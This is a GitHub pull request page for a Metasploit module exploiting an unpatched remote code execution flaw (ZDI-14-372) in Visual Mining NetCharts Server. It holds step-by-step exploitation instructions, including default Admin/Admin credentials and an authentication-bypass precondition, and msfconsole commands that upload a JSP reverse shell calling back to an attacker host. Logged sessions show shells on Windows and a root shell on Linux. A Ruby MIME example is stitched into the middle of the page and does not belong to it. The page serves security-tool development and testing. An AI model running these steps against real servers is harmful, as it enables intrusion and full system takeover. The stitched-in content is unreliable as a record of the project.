Add module for ZDI-14-372 Visual Mining NetCharts Remote Code Execution #4139

Merged
merged 6 commits into from Nov 7, 2014


jvazquez-r7
Contributor

This pull request includes:

  • Exploit for ZDI-14-372 Visual Mining NetCharts Remote Code Execution (http://www.zerodayinitiative.com/advisories/ZDI-14-372/)
  • Small fix for Rex::MIME::Message, because its method #to_s was adding a bad first new line when the message had no headers. Specs have been updated too.
  • Fix for Msf::Payload::JSP to randomize some variables used in the JSP payloads. In this exploit the out variable was creating a conflict when JASPER was trying to compile the JSP. I've randomized some 'common' variable names.

Verification

  • Ensure that travis is green
  • Download Visual Mining Netcharts 7.0. It's available for download from: http://www.visualmining.com/download-ncd-ncs/
  • At the time of writing there is no patch; verify that the installers have not been updated, my shasum signatures:
51f406615a52b33b517c1de15e06c37d3dc1284f  NetChartsServer7.0.exe
5497b39d93b4fe8559d08c86276560b688b19798  NetChartsServer7.0.linux.bin
  • Install Visual Mining NetCharts on a Windows or Linux system. I've used Windows 2008 and Ubuntu 10.04. But it should work in any Visual Mining NetCharts supported OS.
  • While installing feel free to do a "Complete installation" or just a "Production Server" installation. The vulnerabilities exist in both deployments.
  • Verify that the service is running after installation: access http://localhost:8001/Admin
  • Access the web administration console, default credentials: Admin / Admin
  • Access Security / Manage Users
  • You need to do some operation related to users: Change the Admin's password or create a new user. It is important, otherwise the authentication bypass won't work.
  • Open msfconsole and use the module
msf > use exploit/multi/http/visual_mining_netcharts_upload
  • Set the remote host target (RHOST)
msf exploit(visual_mining_netcharts_upload) > set RHOST 172.16.158.134
RHOST => 172.16.158.134
  • Run the check command, ensure it detects the service
msf exploit(visual_mining_netcharts_upload) > check
[*] 172.16.158.134:8001 - The target service is running, but could not be validated.
  • Set the payload to one of the JSP payloads (reverse_tcp or bind_tcp)
msf exploit(visual_mining_netcharts_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(visual_mining_netcharts_upload) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
  • Exploit, hopefully enjoy a session!
  • windows
msf exploit(visual_mining_netcharts_upload) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.134:8001 - Uploading JSP payload Gfs0XXWCWBN.jsp...
[+] 172.16.158.134:8001 - JSP payload uploaded successfully
[*] 172.16.158.134:8001 - Executing payload...
[+] Deleted ./webapps/Admin/archive/ArchiveCache/Gfs0XXWCWBN.jsp

Microsoft Windows [Version 6.0.6002]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>echo 4232034632;echo mreyStVzgdccAVmbMQucqJmxbgPXQjnb
4232034632;echo mreyStVzgdccAVmbMQucqJmxbgPXQjnb

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>rm -f "./webapps/Admin/archive/ArchiveCache/Gfs0XXWCWBN.jsp" >/dev/null ; echo ' & attrib.exe -r ".\webapps\Admin\archive\ArchiveCache\Gfs0XXWCWBN.jsp" & del.exe /f /q ".\webapps\Admin\archive\ArchiveCache\Gfs0XXWCWBN.jsp" & echo " ' >/dev/null;echo BAuuirxaniPBsuAXbQBPhmqSDKYEVapG
" ' >/dev/null;echo BAuuirxaniPBsuAXbQBPhmqSDKYEVapG

C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files\Visual Mining\NetCharts Server 7.0\Server>
  • linux
msf exploit(visual_mining_netcharts_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.133:8001 - Uploading JSP payload 9JkF7nKxOXK3.jsp...
[+] 172.16.158.133:8001 - JSP payload uploaded successfully
[*] 172.16.158.133:8001 - Executing payload...
[+] Deleted ./webapps/Admin/archive/ArchiveCache/9JkF7nKxOXK3.jsp

3314479140
cYfmhmfzJYidueBrQjHsNUGVecEdUzuW
OcCwWIcoJpzqEGPmpNeuqswglQpjvZuY
id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 2? [y/N]  y

When header is empty it shouldn't add a starting empty new line
Because the JASPER engine with Tomcat has been found complaining about the out variable.
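The Rex::MIME::Message point in the PR description (a spurious leading new line from #to_s when a message carries no headers) is easy to miss in review, so here is an added example that is not the Metasploit/Rex project's code: a minimal MIME serializer with the defective behaviour beside the corrected one, plus a check a spec would make. The class and method names (MiniMimeMessage, to_s_buggy, to_s_fixed, leading_blank_line?) are assumptions for illustration, not Rex's API.

```ruby
# Added example, not code from the Metasploit/Rex project. Reproduces the
# empty-headers defect described in the PR next to a fixed serializer.
# All names below are assumptions, not Rex::MIME::Message's real API.

CRLF = "\r\n".freeze

class MiniMimeMessage
  attr_reader :headers, :body

  # headers: array of [name, value] pairs (constructed); body: raw string
  def initialize(headers = [], body = "")
    @headers = headers
    @body = body
  end

  # "Name: value" lines joined by CRLF; empty string when there are no headers
  def header_block
    @headers.map { |name, value| "#{name}: #{value}" }.join(CRLF)
  end

  # Defective serializer: unconditionally writes "<headers>\r\n\r\n<body>",
  # so a headerless message starts with a blank line instead of its body.
  def to_s_buggy
    header_block + CRLF + CRLF + @body
  end

  # Fixed serializer: the header block and its terminating blank line are
  # only emitted when at least one header is present.
  def to_s_fixed
    return @body if @headers.empty?
    header_block + CRLF + CRLF + @body
  end
end

# Constructed samples: one headerless part and one with a Content-Type header.
def headerless_sample
  MiniMimeMessage.new([], "<%-- constructed body --%>")
end

def headed_sample
  MiniMimeMessage.new([["Content-Type", "text/plain"]], "hello")
end

# Spec-style check: does the serialized form begin with a bare CRLF?
def leading_blank_line?(serialized)
  serialized.start_with?(CRLF)
end

if __FILE__ == $PROGRAM_NAME
  m = headerless_sample
  puts "buggy starts with blank line: #{leading_blank_line?(m.to_s_buggy)}"
  puts "fixed starts with blank line: #{leading_blank_line?(m.to_s_fixed)}"
  puts headed_sample.to_s_fixed.inspect
end
```

The fixed and buggy serializers agree whenever headers exist; they differ only in the headerless case, which is exactly the regression a spec should pin down so the stray new line cannot return.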
@kernelsmith
Contributor

Juan, I don't think it matters since we're uploading jsp, but did you test on 32bit or 64?

@jvazquez-r7
Contributor Author

@kernelsmith, good question, tried on a 32-bit system

@kernelsmith
Contributor

Win Server 2008 x64:

msf exploit(visual_mining_netcharts_upload) > so

Module options (exploit/multi/http/visual_mining_netcharts_upload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password to authenticate with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.66.252   yes       The target address
   RPORT     8001             yes       The target port
   USERNAME                   no        The username to authenticate with
   VHOST                      no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.66.1     yes       The listen address
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Visual Mining NetCharts Server 7.0


msf exploit(visual_mining_netcharts_upload) > exploit

[*] Started reverse handler on 192.168.66.1:4444
[*] 192.168.66.252:8001 - Uploading JSP payload mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp...
[+] 192.168.66.252:8001 - JSP payload uploaded successfully
[*] 192.168.66.252:8001 - Executing payload...
[*] Command shell session 1 opened (192.168.66.1:4444 -> 192.168.66.252:49174) at 2014-11-06 22:26:38 -0600
[+] Deleted ./webapps/Admin/archive/ArchiveCache/mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>echo 2540159369;echo KediuawYppdkgoGKpeZSTfmskctxpuBS
2540159369;echo KediuawYppdkgoGKpeZSTfmskctxpuBS

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>rm -f "./webapps/Admin/archive/ArchiveCache/mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" >/dev/null ; echo ' & attrib.exe -r ".\webapps\Admin\archive\ArchiveCache\mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" & del.exe /f /q ".\webapps\Admin\archive\ArchiveCache\mACLGdsdLrOmyZYEgUTVnn1oFpP.jsp" & echo " ' >/dev/null;echo OexvIaSdCHkctEzFkTylSUvngQYZXTfg
" ' >/dev/null;echo OexvIaSdCHkctEzFkTylSUvngQYZXTfg

C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>
C:\Program Files (x86)\Visual Mining\NetCharts Server 7.0\Server>

@kernelsmith kernelsmith merged commit c833888 into rapid7:master Nov 7, 2014
kernelsmith added a commit that referenced this pull request Nov 7, 2014
landed after some touch up
@jvazquez-r7
Contributor Author

ooom, thanks @kernelsmith ! :)

@jvazquez-r7 jvazquez-r7 deleted the zdi_14_372_visual_mining branch November 18, 2014 15:59